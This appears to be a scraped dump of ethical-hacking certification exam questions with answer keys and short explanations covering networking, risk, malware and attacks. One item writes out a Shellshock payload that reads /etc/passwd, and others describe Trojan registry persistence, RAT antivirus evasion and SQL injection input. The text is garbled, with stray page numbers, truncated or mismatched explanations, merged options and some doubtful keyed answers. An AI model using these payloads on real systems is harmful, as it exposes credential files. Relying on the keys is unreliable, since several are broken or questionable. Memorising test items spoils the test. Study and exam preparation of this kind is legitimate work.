A (Explanation: The LM hash is computed as follows: 1. The user's password is restricted to a maximum of fourteen characters. 2. The user's password is converted to uppercasE. EtC. 14 character Windows passwords, which are stored with LM Hash, can be cracked in five seconds. References: https://en.wikipedia.org/wiki/LM_hash)

243 Which of the following statements is TRUE? A. Sniffers operate on Layer 2 of the OSI model B. Sniffers operate on Layer 3 of the OSI model C. Sniffers operate on both Layer 2 & Layer 3 of the OSI model. D. Sniffers operate on the Layer 1 of the OSI model.

A (Explanation: The OSI layer 2 is where packet sniffers collect their datA. References: https://en.wikipedia.org/wiki/Ethernet_frame)

267 This international organization regulates billions of transactions daily and provides security guidelines to protect personally identifiable information (PII). These security controls provide a baseline and prevent low-level hackers sometimes known as script kiddies from causing a data breach. Which of the following organizations is being described? A. Payment Card Industry (PCI) B. Center for Disease Control (CDC) C. Institute of Electrical and Electronics Engineers (IEEE) D. International Security Industry Organization (ISIO)

A (Explanation: The Payment Card Industry Data Security Standard (PCI DSS) is a proprietary information security standard for organizations that handle branded credit cards from the major card schemes including Visa, MasterCard, American Express, Discover, and JCB. The PCI DSS standards are very explicit about the requirements for the back end storage and access of PII (personally identifiable information). References: https://en.wikipedia.org/wiki/Payment_Card_Industry_Data_Security_Standard)

271 While using your bank's online servicing you notice the following string in the URL bar: "http://www.MyPersonalBank.com/account?id=368940911028389&Damount=10980&Camount=21" You observe that if you modify the Damount & Camount values and submit the request, that data on the web page reflect the changes. Which type of vulnerability is present on this site? A. Web Parameter Tampering B. Cookie Tampering C. XSS Reflection D. SQL injection

A (Explanation: The Web Parameter Tampering attack is based on the manipulation of parameters exchanged between client and server in order to modify application data, such as user credentials and permissions, price and quantity of products, etc. Usually, this information is stored in cookies, hidden form fields, or URL Query Strings, and is used to increase application functionality and control. References: https://www.owasp.org/index.php/Web_Parameter_Tampering)

280 A common cryptographical tool is the use of XOR. XOR the following binary values: 10110001 00111010 A. 10001011 B. 11011000 C. 10011101 D. 10111100

A (Explanation: The XOR gate is a digital logic gate that implements an exclusive or; that is, a true output (1/HIGH) results if one, and only one, of the inputs to the gate is true. If both inputs are false (0/LOW) or both are true, a false output results. XOR represents the inequality function, i.e., the output is true if the inputs are not alike otherwise the output is false. A way to remember XOR is "one or the other but not both". References: https://en.wikipedia.org/wiki/XOR_gate 154)

317 In Risk Management, how is the term "likelihood" related to the concept of "threat?" A. Likelihood is the probability that a threat-source will exploit a vulnerability. B. Likelihood is a possible threat-source that may exploit a vulnerability. C. Likelihood is the likely source of a threat that could exploit a vulnerability. D. Likelihood is the probability that a vulnerability is a threat-sourcE.

A (Explanation: The ability to analyze the likelihood of threats within the organization is a critical step in building an effective security program. The process of assessing threat probability should be well defined and incorporated into a broader threat analysis process to be effective. References: http://www.mcafee.com/campaign/securitybattleground/resources/chapter5/whitepaper-onassessing- threat-attack-likelihood.pdf)

318 The chance of a hard drive failure is once every three years. The cost to buy a new hard drive is $300. It will require 10 hours to restore the OS and software to the new hard disk. It will require a further 4 hours to restore the database from the last backup to the new hard disk. The recovery person earns $10/hour. Calculate the SLE, ARO, and ALE. Assume the EF = 1 (100%). What is the closest approximate cost of this replacement and recovery operation per year? A. $146 B. $1320 C. $440 D. $100

A (Explanation: The annualized loss expectancy (ALE) is the product of the annual rate of occurrence (ARO) and the single loss expectancy (SLE). Suppose than an asset is valued at $100,000, and the Exposure Factor (EF) for this asset is 25%. The single loss expectancy (SLE) then, is 25% * $100,000, or $25,000. In our example the ARO is 33%, and the SLE is 300+14*10 (as EF=1). The ALO is thus: 33%*(300+14*10) which equals 146. References: https://en.wikipedia.org/wiki/Annualized_loss_expectancy)

356 During a security audit of IT processes, an IS auditor found that there were no documented security procedures. What should the IS auditor do? A. Identify and evaluate existing practices B. Create a procedures document C. Conduct compliance testing D. Terminate the audit

A (Explanation: The auditor should first evaluated existing policies and practices to identify problem areas and opportunities.)

265 The Heartbleed bug was discovered in 2014 and is widely referred to under MITRE's Common Vulnerabilities and Exposures (CVE) as CVE-2014-0160. This bug affects the OpenSSL implementation of the transport layer security (TLS) protocols defined in RFC6520. What type of key does this bug leave exposed to the Internet making exploitation of any compromised system very easy? A. Private B. Public C. Shared D. Root

A (Explanation: The data obtained by a Heartbleed attack may include unencrypted exchanges between TLS parties likely to be confidential, including any form post data in users' requests. Moreover, the confidential data exposed could include authentication secrets such as session cookies and passwords, which might allow attackers to impersonate a user of the service. An attack may also reveal private keys of compromised parties. References: https://en.wikipedia.org/wiki/Heartbleed 144)

236 You have successfully gained access to your client's internal network and successfully comprised a Linux server which is part of the internal IP network. You want to know which Microsoft Windows workstations have file sharing enabled Which port would you see listening on these Windows machines in the network? A. 445 B. 3389 C. 161 D. 1433

A (Explanation: The following ports are associated with file sharing and server message block (SMB) communications: References: https://support.microsoft.com/en-us/kb/298804)

300 You've just been hired to perform a pen test on an organization that has been subjected to a largescale attack. The CIO is concerned with mitigating threats and vulnerabilities to totally eliminate risk. What is one of the first things you should do when given the job? A. Explain to the CIO that you cannot eliminate all risk, but you will be able to reduce risk to acceptable levels. B. Interview all employees in the company to rule out possible insider threats. C. Establish attribution to suspected attackers. D. Start the wireshark application to start sniffing network traffic

A (Explanation: The goals of penetration tests are: References: https://en.wikipedia.org/wiki/Penetration_test)

276 An attacker has installed a RAT on a host. The attacker wants to ensure that when a user attempts to go to "www.MyPersonalBank.com", that the user is directed to a phishing site. Which file does the attacker need to modify? A. Hosts B. Sudoers C. Boot.ini D. Networks

A (Explanation: The hosts file is a computer file used by an operating system to map hostnames to IP addresses. The hosts file contains lines of text consisting of an IP address in the first text field followed by one or more host names. References: https://en.wikipedia.org/wiki/Hosts_(file))

328 An attacker gains access to a Web server's database and displays the contents of the table that holds all of the names, passwords, and other user information. The attacker did this by entering information into the Web site's user login page that the software's designers did not expect to be entered. This is an example of what kind of software design problem? A. Insufficient input validation B. Insufficient exception handling C. Insufficient database hardening D. Insufficient security management

A (Explanation: The most common web application security weakness is the failure to properly validate input coming from the client or from the environment before using it. This weakness leads to almost all of the major vulnerabilities in web applications, such as cross site scripting, SQL injection, interpreter injection, locale/Unicode attacks, file system attacks, and buffer overflows. References: https://www.owasp.org/index.php/Testing_for_Input_Validation)

339 Risks = Threats x Vulnerabilities is referred to as the: A. Risk equation B. Threat assessment C. BIA equation D. Disaster recovery formula

A (Explanation: The most effective way to define risk is with this simple equation: Risk = Threat x Vulnerability x Cost This equation is fundamental to all information security. References: http://www.icharter.org/articles/risk_equation.html)

349 Which of the following tools can be used for passive OS fingerprinting? A. tcpdump B. nmap C. ping D. tracert

A (Explanation: The passive operating system fingerprinting is a feature built into both the pf and tcpdump tools. References: http://geek00l.blogspot.se/2007/04/tcpdump-privilege-dropping-passive-os.html 200)

250 You have successfully compromised a machine on the network and found a server that is alive on the same network. You tried to ping it but you didn't get any response back. What is happening? A. ICMP could be disabled on the target server. B. The ARP is disabled on the target server. C. TCP/IP doesn't support ICMP. D. You need to run the ping command with root privileges.

A (Explanation: The ping utility is implemented using the ICMP "Echo request" and "Echo reply" messages. Note: The Internet Control Message Protocol (ICMP) is one of the main protocols of the internet protocol suite. It is used by network devices, like routers, to send error messages indicating, for example, that a requested service is not available or that a host or router could not be reached. References: https://en.wikipedia.org/wiki/Internet_Control_Message_Protocol)

251 Under the "Post-attack Phase and Activities", it is the responsibility of the tester to restore the systems to a pre-test statE. Which of the following activities should not be included in this phase? (see exhibit) Exhibit: A. III B. IV C. III and IV D. All should be included

A (Explanation: The post-attack phase revolves around returning any modified system(s) to the pretest statE. 134 Examples of such activities: References: Computer and Information Security Handbook, John R. Vacca (2012), page 531)

338 What term describes the amount of risk that remains after the vulnerabilities are classified and the countermeasures have been deployed? A. Residual risk B. Inherent risk C. Deferred risk D. Impact risk

A (Explanation: The residual risk is the risk or danger of an action or an event, a method or a (technical) process that, although being abreast with science, still conceives these dangers, even if all theoretically possible safety measures would be applied (scientifically conceivable measures); in other words, the amount of risk left over after natural or inherent risks have been reduced by risk controls. References: https://en.wikipedia.org/wiki/Residual_risk)

296 The Open Web Application Security Project (OWASP) is the worldwide not-for-profit charitable organization focused on improving the security of software. What item is the primary concern on OWASP's Top Ten Project Most Critical Web Application Security Risks? A. Injection B. Cross Site Scripting C. Cross Site Request Forgery D. Path disclosure

A (Explanation: The top item of the OWASP 2013 OWASP's Top Ten Project Most Critical Web Application Security Risks is injection. Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization. References: https://www.owasp.org/index.php/Top_10_2013-Top_10)

254 A medium-sized healthcare IT business decides to implement a risk management strategy. Which of the following is NOT one of the five basic responses to risk? A. Delegate B. Avoid C. Mitigate D. Accept

A (Explanation: There are five main ways to manage risk: acceptance, avoidance, transference, mitigation or exploitation. References: http://www.dbpmanagement.com/15/5-ways-to-manage-risk 136)

354 Which of the following incident handling process phases is responsible for defining rules, collaborating human workforce, creating a back-up plan, and testing the plans for an organization? A. Preparation phase B. Containment phase C. Identification phase D. Recovery phase

A (Explanation: There are several key elements to have implemented in preparation phase in order to help mitigate any potential problems that may hinder one's ability to handle an incident. For the sake of brevity, the following should be performed: References: https://www.sans.org/reading-room/whitepapers/incident/incident-handlers-handbook- 33901)

302 Which of the following is the least-likely physical characteristic to be used in biometric control that supports a large company? A. Height and Weight B. Voice C. Fingerprints D. Iris patterns

A (Explanation: There are two main types of biometric identifiers: Examples of physiological characteristics used for biometric authentication include fingerprints; DNA; face, hand, retina or ear features; and odor. Behavioral characteristics are related to the pattern of the behavior of a person, such as typing rhythm, gait, gestures and voicE. References: http://searchsecurity.techtarget.com/definition/biometrics)

316 An incident investigator asks to receive a copy of the event logs from all firewalls, proxy servers, and Intrusion Detection Systems (IDS) on the network of an organization that has experienced a possible breach of security. When the investigator attempts to correlate the information in all of the logs, the sequence of many of the logged events do not match up. What is the most likely cause? A. The network devices are not all synchronized. B. Proper chain of custody was not observed while collecting the logs. C. The attacker altered or erased events from the logs. D. The security breach was a false positive

A (Explanation: Time synchronization is an important middleware service of distributed systems, amongst which Distributed Intrusion Detection System (DIDS) makes extensive use of time synchronization in particular. References: http://ieeexplore.ieee.org/xpl/login.jsp?tp=&arnumber=5619315&url=http%3A%2F%2Fieeexplore.i 178 eee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D5619315)

278 env x=`(){ :;};echo exploit` bash -c 'cat /etc/passwd' What is the Shellshock bash vulnerability attempting to do on an vulnerable Linux host? A. Display passwd content to prompt B. Removes the passwd file C. Changes all passwords in passwd D. Add new user to the passwd file

A (Explanation: To extract private information, attackers are using a couple of techniques. The simplest extraction attacks are in the form: () {:;}; /bin/cat /etc/passwd That reads the password file /etc/passwd, and adds it to the response from the web server. So an attacker injecting this code through the Shellshock vulnerability would see the password file dumped out onto their screen as part of the web page returneD. References: https://blog.cloudflare.com/inside-shellshock/)

244 You are logged in as a local admin on a Windows 7 system and you need to launch the Computer Management Console from command line. Which command would you use? A. c:\compmgmt.msc B. c:\services.msc C. c:\ncpa.cp D. c:\gpedit

A (Explanation: To start the Computer Management Console from command line just type compmgmt.msc /computer:computername in your run box or at the command line and it should automatically open the Computer Management consolE. 129 References: http://www.waynezim.com/tag/compmgmtmsc/)

319 A network administrator discovers several unknown files in the root directory of his Linux FTP server. One of the files is a tarball, two are shell script files, and the third is a binary file is named "nc." The FTP server's access logs show that the anonymous user account logged in to the server, uploaded the files, and extracted the contents of the tarball and ran the script using a function provided by the FTP server's software. The ps command shows that the nc file is running as process, and the netstat command shows the nc process is listening on a network port. What kind of vulnerability must be present to make this remote attack possible? A. File system permissions B. Privilege escalation C. Directory traversal D. Brute force login

A (Explanation: To upload files the user must have proper write file permissions. References: http://codex.wordpress.org/Hardening_WordPress)

95 The network administrator for a company is setting up a website with e-commerce capabilities. Packet sniffing is a concern because credit card information will be sent electronically over the Internet. Customers visiting the site will need to encrypt the data with HTTPS. Which type of certificate is used to encrypt and decrypt the data? A. Asymmetric B. Confidential C. Symmetric D. Non-confidential

A (Explanation: Topic 4, Tools /Systems /Programs)

281 Which of the following is the successor of SSL? A. TLS B. RSA C. GRE D. IPSec

A (Explanation: Transport Layer Security (TLS) and its predecessor, Secure Sockets Layer (SSL), both of which are frequently referred to as 'SSL', are cryptographic protocols that provide communications security over a computer network. References: https://en.wikipedia.org/wiki/Transport_Layer_Security)

310 Which of the following is an extremely common IDS evasion technique in the web world? A. unicode characters B. spyware C. port knocking D. subnetting

A (Explanation: Unicode attacks can be effective against applications that understand it. Unicode is the international standard whose goal is to represent every character needed by every written human language as a single integer number. What is known as Unicode evasion should more correctly be referenced as UTF-8 evasion. Unicode characters are normally represented with two bytes, but this is impractical in real life. One aspect of UTF-8 encoding causes problems: non-Unicode characters can be represented encoded. What is worse is multiple representations of each character can exist. Non-Unicode character encodings are known as overlong characters, and may be signs of attempted attack. References: http://books.gigatux.nl/mirror/apachesecurity/0596007248/apachesc-chp-10-sect- 8.html)

266 In 2007, this wireless security algorithm was rendered useless by capturing packets and discovering the passkey in a matter of seconds. This security flaw led to a network invasion of TJ Maxx and data theft through a technique known as wardriving. Which Algorithm is this referring to? A. Wired Equivalent Privacy (WEP) B. Wi-Fi Protected Access (WPA) C. Wi-Fi Protected Access 2 (WPA2) D. Temporal Key Integrity Protocol (TKIP)

A (Explanation: WEP is the currently most used protocol for securing 802.11 networks, also called wireless lans or wlans. In 2007, a new attack on WEP, the PTW attack, was discovered, which allows an attacker to recover the secret key in less than 60 seconds in some cases. Note: Wardriving is the act of searching for Wi-Fi wireless networks by a person in a moving vehicle, using a portable computer, smartphone or personal digital assistant (PDA). References: https://events.ccc.de/camp/2007/Fahrplan/events/1943.en.html)

235 Initiating an attack against targeted businesses and organizations, threat actors compromise a carefully selected website by inserting an exploit resulting in malware infection. The attackers run exploits on well-known and trusted sites likely to be visited by their targeted victims. Aside from carefully choosing sites to compromise, these attacks are known to incorporate zero-day exploits that target unpatched vulnerabilities. Thus, the targeted entities are left with little or no defense against these exploits. What type of attack is outlined in the scenario? A. Watering Hole Attack B. Heartbleed Attack C. Shellshock Attack D. Spear Phising Attack

A (Explanation: Watering Hole is a computer attack strategy, in which the victim is a particular group (organization, industry, or region). In this attack, the attacker guesses or observes which websites the group often uses and infects one or more of them with malware. Eventually, some member of the targeted group gets infected.)

292 You are a Network Security Officer. You have two machines. The first machine (192.168.0.99) has snort installed, and the second machine (192.168.0.150) has kiwi syslog installed. You perform a syn scan in your network, and you notice that kiwi syslog is not receiving the alert message from snort. You decide to run wireshark in the snort machine to check if the messages are going to the kiwi syslog machine. What wireshark filter will show the connections from the snort machine to kiwi syslog machine? A. tcp.dstport==514 && ip.dst==192.168.0.150 B. tcp.srcport==514 && ip.src==192.168.0.99 C. tcp.dstport==514 && ip.dst==192.168.0.0/16 D. tcp.srcport==514 && ip.src==192.168.150

A (Explanation: We need to configure destination port at destination ip. The destination ip is 192.168.0.150, where the kiwi syslog is installeD. References: https://wiki.wireshark.org/DisplayFilters)

285 How does the Address Resolution Protocol (ARP) work? A. It sends a request packet to all the network elements, asking for the MAC address from a specific IP. B. It sends a reply packet to all the network elements, asking for the MAC address from a specific IP. C. It sends a reply packet for a specific IP, asking for the MAC address. D. It sends a request packet to all the network elements, asking for the domain name from a specific IP.

A (Explanation: When an incoming packet destined for a host machine on a particular local area network arrives at a gateway, the gateway asks the ARP program to find a physical host or MAC address that matches the IP address. The ARP program looks in the ARP cache and, if it finds the address, provides it so that the packet can be converted to the right packet length and format and sent to the machine. If no entry is found for the IP address, ARP broadcasts a request packet in a special format to all the machines on the LAN to see if one machine knows that it has that IP address associated with it. A machine that recognizes the IP address as its own returns a reply so indicating. ARP updates the ARP cache for future reference and then sends the packet to the MAC address that replied. References: http://searchnetworking.techtarget.com/definition/Address-Resolution-Protocol-ARP)

247 You have successfully gained access to a linux server and would like to ensure that the succeeding outgoing traffic from this server will not be caught by a Network Based Intrusion Detection Systems (NIDS). What is the best way to evade the NIDS? A. Encryption B. Protocol Isolation C. Alternate Data Streams D. Out of band signalling

A (Explanation: When the NIDS encounters encrypted traffic, the only analysis it can perform is packet level analysis, since the application layer contents are inaccessible. Given that exploits against today's networks are primarily targeted against network services (application layer entities), packet level analysis ends up doing very little to protect our core business assets. References: http://www.techrepublic.com/article/avoid-these-five-common-ids-implementationerrors/ 131)

313 Which mode of IPSec should you use to assure security and confidentiality of data within the same LAN? A. ESP transport mode B. AH permiscuous C. ESP confidential D. AH Tunnel mode

A (Explanation: When transport mode is used, IPSec encrypts only the IP payload. Transport mode provides the protection of an IP payload through an AH or ESP header. Encapsulating Security Payload (ESP) provides confidentiality (in addition to authentication, integrity, and anti-replay protection) for the IP payload.)

334 The "white box testing" methodology enforces what kind of restriction? A. The internal operation of a system is completely known to the tester. B. Only the external operation of a system is accessible to the tester. C. Only the internal operation of a system is known to the tester. D. The internal operation of a system is only partly accessible to the tester.

A (Explanation: White-box testing (also known as clear box testing, glass box testing, transparent box testing, and structural testing) is a method of testing software that tests internal structures or workings of an application, as opposed to its functionality (i.e. black-box testing). In white-box testing an internal perspective of the system, as well as programming skills, are used to design test cases. References: https://en.wikipedia.org/wiki/White-box_testing)

260 The network administrator contacts you and tells you that she noticed the temperature on the internal wireless router increases by more than 20% during weekend hours when the office was closed. She asks you to investigate the issue because she is busy dealing with a big conference and she doesn't have time to perform the task. What tool can you use to view the network traffic being sent and received by the wireless router? A. Wireshark B. Nessus C. Netcat D. Netstat

A (Explanation: Wireshark is a Free and open source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education.)

290 When you are getting information about a web server, it is very important to know the HTTP Methods (GET, POST, HEAD, PUT, DELETE, TRACE) that are available because there are two critical methods (PUT and DELETE). PUT can upload a file to the server and DELETE can delete a file from the server. You can detect all these methods (GET, POST, HEAD, PUT, DELETE, TRACE) using NMAP script enginE. What nmap script will help you with this task? A. http-methods B. http enum C. http-headers D. http-git

A (Explanation: You can check HTTP method vulnerability using NMAP. Example: #nmap -script=http-methods.nse 192.168.0.25 References: http://solutionsatexperts.com/http-method-vulnerability-check-using-nmap/)

242 You have compromised a server on a network and successfully opened a shell. You aimed to identify all operating systems running on the network. However, as you attempt to fingerprint all machines in the network using the nmap syntax below, it is not going through. invictus@victim_server:~$ nmap -T4 -O 10.10.0.0/24 TCP/IP fingerprinting (for OS scan) xxxxxxx xxxxxx xxxxxxxxx. QUITTING! What seems to be wrong? A. OS Scan requires root privileges. B. The nmap syntax is wrong. C. This is a common behavior for a corrupted nmap application. D. The outgoing TCP/IP fingerprinting is blocked by the host firewall.

A (Explanation: You requested a scan type which requires root privileges. References: http://askubuntu.com/questions/433062/using-nmap-for-information-regarding-webhost)

275 You've gained physical access to a Windows 2008 R2 server which has an accessible disc drivE. When you attempt to boot the server and log in, you are unable to guess the password. In your tool kit you have an Ubuntu 9.10 Linux LiveCD. Which Linux based tool has the ability to change any user's password or to activate disabled Windows accounts? A. CHNTPW B. Cain & Abel C. SET D. John the Ripper

A (Explanation: chntpw is a software utility for resetting or blanking local passwords used by Windows NT, 2000, XP, Vista, 7, 8 and 8.1. It does this by editing the SAM database where Windows stores password hashes. References: https://en.wikipedia.org/wiki/Chntpw)

241 You have successfully comprised a server having an IP address of 10.10.0.5. You would like to enumerate all machines in the same network quickly. What is the best nmap command you will use? A. nmap -T4 -F 10.10.0.0/24 B. nmap -T4 -r 10.10.1.0/24 C. nmap -T4 -O 10.10.0.0/24 D. nmap -T4 -q 10.10.0.0/24

A (Explanation: command = nmap -T4 -F description = This scan is faster than a normal scan because it uses the aggressive timing template and scans fewer ports. References: https://svn.nmap.org/nmap/zenmap/share/zenmap/config/scan_profile.usp 127)

329 Which of the following is a protocol specifically designed for transporting event messages? A. SYSLOG B. SMS C. SNMP D. ICMP

A (Explanation: syslog is a standard for message logging. It permits separation of the software that generates messages, the system that stores them, and the software that reports and analyzes them. Each message is labeled with a facility code, indicating the software type generating the message, and assigned a severity label. References: https://en.wikipedia.org/wiki/Syslog#Network_protocol)

308 Which of the following is a command line packet analyzer similar to GUI-based Wireshark? A. tcpdump B. nessus C. etherea D. Jack the ripper

A (Explanation: tcpdump is a common packet analyzer that runs under the command line. It allows the user to display TCP/IP and other packets being transmitted or received over a network to which the computer is attached. References: https://en.wikipedia.org/wiki/Tcpdump)

346 Which of the following tools is used to analyze the files produced by several packet-capture programs such as tcpdump, WinDump, Wireshark, and EtherPeek? A. tcptrace B. tcptraceroute C. Nessus D. OpenVAS

A (Explanation: tcptrace is a tool for analysis of TCP dump files. It can take as input the files produced by several popular packet-capture programs, including tcpdump/WinDump/Wireshark, snoop, EtherPeek, and Agilent NetMetrix. 198 References: https://en.wikipedia.org/wiki/Tcptrace)

763 You are trying to package a RAT Trojan so that Anti-Virus software will not detect it. Which of the listed technique will NOT be effective in evading Anti-Virus scanner? A. Convert the Trojan.exe file extension to Trojan.txt disguising as text file B. Break the Trojan into multiple smaller files and zip the individual pieces C. Change the content of the Trojan using hex editor and modify the checksum D. Encrypt the Trojan using multiple hashing algorithms like MD5 and SHA-1

A ( Convert the Trojan.exe file extension to Trojan.txt disguising as text file)

378 Which of the following is most effective against passwords ? Select the

A ( Dictionary Attack B. BruteForce attack C. Targeted Attack D. Manual password Attack Answer: B (Explanation: The most effective means of password attack is brute force, in a brute force attack the program will attempt to use every possible combination of characters. While this takes longer then a dictionary attack, which uses a text file of real words, it is always capable of breaking the password. 225)

761 The traditional traceroute sends out ICMP ECHO packets with a TTL of one, and increments the TTL until the destination has been reached. By printing the gateways that generate ICMP time exceeded messages along the way, it is able to determine the path packets take to reach the destination. The problem is that with the widespread use of firewalls on the Internet today, many of the packets that traceroute sends out end up being filtered, making it impossible to completely trace the path to the destination. How would you overcome the Firewall restriction on ICMP ECHO packets? A. Firewalls will permit inbound TCP packets to specific ports that hosts sitting behind the firewall are listening for connections. By sending out TCP SYN packets instead of ICMP ECHO packets, traceroute can bypass the most common firewall filters. B. Firewalls will permit inbound UDP packets to specific ports that hosts sitting behind the firewall are listening for connections. By sending out TCP SYN packets instead of ICMP ECHO packets, traceroute can bypass the most common firewall filters. C. Firewalls will permit inbound UDP packets to specific ports that hosts sitting behind the firewall are listening for connections. By sending out TCP SYN packets instead of ICMP ECHO packets, traceroute can bypass the most common firewall filters. D. Do not use traceroute command to determine the path packets take to reach the destination instead use the custom hacking tool JOHNTHETRACER and run with the command E. \> JOHNTHETRACER www.eccouncil.org -F -evade

A ( Firewalls will permit inbound TCP packets to specific ports that hosts sitting behind the firewall are listening for connections. By sending out TCP SYN packets instead of ICMP ECHO packets, traceroute can bypass the most common firewall filters.)

742 Which of the following Registry location does a Trojan add entries to make it persistent on Windows 7? (Select 2 answers) A. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run B. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\System32\CurrentVersion\ Run C. HKEY_CURRENT_USER\Software\Microsoft\Windows\System32\CurrentVersion\Run D. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

A ( HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run D. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run)

638 In what stage of Virus life does a stealth virus gets activated with the user performing certain actions such as running an infected program? 385 A. Design B. Elimination C. Incorporation D. Replication E. Launch F. Detection

E

759 Jake is a network administrator who needs to get reports from all the computer and network devices on his network. Jake wants to use SNMP but is afraid that won't be secure since passwords and messages are in clear text. How can Jake gather network information in a secure manner? A. He can use SNMPv3 B. Jake can use SNMPrev5 C. He can use SecWMI D. Jake can use SecSNMP

A ( He can use SNMPv3)

750 Neil is an IT security consultant working on contract for Davidson Avionics. Neil has been hired to audit the network of Davidson Avionics. He has been given permission to perform any tests necessary. Neil has created a fake company ID badge and uniform. Neil waits by one of the company's entrance doors and follows an employee into the office after they use their valid access card to gain entrance. What type of social engineering attack has Neil employed here? A. Neil has used a tailgating social engineering attack to gain access to the offices B. He has used a piggybacking technique to gain unauthorized access C. This type of social engineering attack is called man trapping D. Neil is using the technique of reverse social engineering to gain access to the offices of Davidson Avionics

A ( Neil has used a tailgating social engineering attack to gain access to the offices)

722 Michael is a junior security analyst working for the National Security Agency (NSA) working primarily on breaking terrorist encrypted messages. The NSA has a number of methods they use to decipher encrypted messages including Government Access to Keys (GAK) and inside informants. The NSA holds secret backdoor keys to many of the encryption algorithms used on the Internet. The problem for the NSA, and Michael, is that terrorist organizations are starting to use custom-built algorithms or obscure algorithms purchased from corrupt governments. For this reason, Michael and other security analysts like him have been forced to find different methods of deciphering terrorist messages. One method that Michael thought of using was to hide malicious code inside seemingly harmless programs. Michael first monitors sites and bulletin boards used by known terrorists, and then he is able to glean email addresses to some of these suspected terrorists. Michael then inserts a stealth keylogger into a mapping program file readme.txt and then sends that as an attachment to the terrorist. This keylogger takes screenshots every 2 minutes and also logs all keyboard activity into a hidden file on the terrorist's computer. Then, the keylogger emails those files to Michael twice a day with a built in SMTP server. What technique has Michael used to disguise this keylogging software? A. Steganography B. Wrapping C. ADS D. Hidden Channels

A ( Steganography)

718 Switches maintain a CAM Table that maps individual MAC addresses on the network to physical ports on the switch. In MAC flooding attack, a switch is fed with many Ethernet frames, each containing different source MAC addresses, by the attacker. Switches have a limited memory for mapping various MAC addresses to physical ports. What happens when the CAM table becomes full? A. Switch then acts as hub by broadcasting packets to all machines on the network B. The CAM overflow table will cause the switch to crash causing Denial of Service C. The switch replaces outgoing frame switch factory default MAC address of FF:FF:FF:FF:FF:FF D. Every packet is dropped and the switch sends out SNMP alerts to the IDS port

A ( Switch then acts as hub by broadcasting packets to all machines on the network)

747 Wayne is the senior security analyst for his company. Wayne is examining some traffic logs on a server and came across some inconsistencies. Wayne finds some IP packets from a computer purporting to be on the internal network. The packets originate from 192.168.12.35 with a TTL of 15. The server replied to this computer and received a response from 192.168.12.35 with a TTL of 21. What can Wayne infer from this traffic log? A. The initial traffic from 192.168.12.35 was being spoofed. B. The traffic from 192.168.12.25 is from a Linux computer. C. The TTL of 21 means that the client computer is on wireless. D. The client computer at 192.168.12.35 is a zombie computer.

A ( The initial traffic from 192.168.12.35 was being spoofed.)

707 Nathan is testing some of his network devices. Nathan is using Macof to try and flood the ARP cache of these switches. If these switches' ARP cache is successfully flooded, what will be the result? A. The switches will drop into hub mode if the ARP cache is successfully flooded. B. If the ARP cache is flooded, the switches will drop into pix mode making it less susceptible to attacks. C. Depending on the switch manufacturer, the device will either delete every entry in its ARP cache or reroute packets to the nearest switch. D. The switches will route all traffic to the broadcast address created collisions.

A ( The switches will drop into hub mode if the ARP cache is successfully flooded.)

701 Blane is a network security analyst for his company. From an outside IP, Blane performs an XMAS scan using Nmap. Almost every port scanned does not illicit a response. What can he infer from this kind of response? A. These ports are open because they do not illicit a response. B. He can tell that these ports are in stealth mode. C. If a port does not respond to an XMAS scan using NMAP, that port is closed. D. The scan was not performed correctly using NMAP since all ports, no matter what their state, will illicit some sort of response from an XMAS scan.

A ( These ports are open because they do not illicit a response.)

719 You went to great lengths to install all the necessary technologies to prevent hacking attacks, such as expensive firewalls, antivirus software, anti-spam systems and intrusion detection/prevention tools in your company's network. You have configured the most secure policies and tightened every device on your network. You are confident that hackers will never be able to gain access to your network with complex security system in place. Your peer, Peter Smith who works at the same department disagrees with you. He says even the best network security technologies cannot prevent hackers gaining access to the network because of presence of "weakest link" in the security chain. What is Peter Smith talking about? A. Untrained staff or ignorant computer users who inadvertently become the weakest link in your security chain B. "zero-day" exploits are the weakest link in the security chain since the IDS will not be able to detect these attacks C. "Polymorphic viruses" are the weakest link in the security chain since the Anti-Virus scanners will not be able to detect these attacks D. Continuous Spam e-mails cannot be blocked by your security system since spammers use different techniques to bypass the filters in your gateway

A ( Untrained staff or ignorant computer users who inadvertently become the weakest link in your security chain)

714 Yancey is a network security administrator for a large electric company. This company provides power for over 100,000 people in Las Vegas. Yancey has worked for his company for over 15 years and has become very successful. One day, Yancey comes in to work and finds out that the 430 company will be downsizing and he will be out of a job in two weeks. Yancey is very angry and decides to place logic bombs, viruses, Trojans, and backdoors all over the network to take down the company once he has left. Yancey does not care if his actions land him in jail for 30 or more years, he just wants the company to pay for what they are doing to him. What would Yancey be considered? A. Yancey would be considered a Suicide Hacker B. Since he does not care about going to jail, he would be considered a Black Hat C. Because Yancey works for the company currently; he would be a White Hat D. Yancey is a Hacktivist Hacker since he is standing up to a company that is downsizing

A)

726 What is the correct order of steps in CEH System Hacking Cycle? A. Option A B. Option B C. Option C D. Option D

A)

729 Bill is a security analyst for his company. All the switches used in the company's office are Cisco switches. Bill wants to make sure all switches are safe from ARP poisoning. How can Bill accomplish this? A. Bill can use the command: ip dhcp snooping. B. Bill can use the command: no ip snoop. C. Bill could use the command: ip arp no flood. D. He could use the command: ip arp no snoop.

A)

756 Jeremy is web security consultant for Information Securitas. Jeremy has just been hired to perform contract work for a large state agency in Michigan. Jeremy's first task is to scan all the company's external websites. Jeremy comes upon a login page which appears to allow employees access to sensitive areas on the website. James types in the following statement in the username field: SELECT * from Users where username='admin' ?AND password='' AND email like '%@testers.com%' What will the SQL statement accomplish? A. If the page is susceptible to SQL injection, it will look in the Users table for usernames of admin B. This statement will look for users with the name of admin, blank passwords, and email addresses that end in @testers.com C. This Select SQL statement will log James in if there are any users with NULL passwords D. James will be able to see if there are any default user accounts in the SQL database

A)

402 Which of the following is true of the wireless Service Set ID (SSID)? (Select all that apply.) A. Identifies the wireless network B. Acts as a password for network access C. Should be left at the factory default setting D. Not broadcasting the SSID defeats NetStumbler and other wireless discovery tools

A,B

